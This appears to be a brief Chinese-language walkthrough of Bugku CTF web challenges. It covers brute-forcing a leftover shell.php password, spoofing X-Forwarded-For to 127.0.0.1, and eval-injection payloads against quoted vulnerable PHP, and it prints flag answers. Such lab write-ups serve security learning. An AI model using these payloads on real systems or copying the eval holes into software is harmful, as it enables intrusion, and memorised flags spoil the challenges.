bugku ctf
game1
描 述: game1
网站被黑
WEB
描 述: 网站被黑了 黑客会不会留下后门
第一步扫目录 shell.php路径
第二部 pass密码1111抓包爆破
得到hacker
flag{94ec3a0b6b2ecb817a0fb5018f1b211e}
本地管理员
WEB
描 述: 本地管理员
直接admin test123会提示IP禁止访问,请联系本地管理员登陆,IP已�
请求包添加
X-Forwarded-For:127.0.0.1
eval
描 述: eval
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>
http://x.x.x.x:13063/?hello=file("flag.php")
变量1
WEB
描 述: 题目变量1
$a=b $b=c echo $$a 这时候会输出c GLOBALS:一个包含了全部变量的全局组合数组。变量的名字就是数组的键。
flag In the variable! <? php error_reporting(0); //关闭php错误显示 include "flagl. php"; //引入flag1.php文件代码 highlight_file(file); if(isset($_GET[' args'])){//通过get方式传递 args变量才能执行if里面的代码 $args =$_GET[' args']; if(! preg_match("/\w+$/", Sargs)){//用正则表达式判断$args值,是否为任意大小写字母和0到9以及下划线组成,不是就打印"args error!";是执行var_dump($$args)。 die("args error!"); } eval("var_dump(SSargs);"); } ?>
?args=GLOBALS
头等舱
WEB
描 述: 头等舱
打开网页什么也没有
使用burp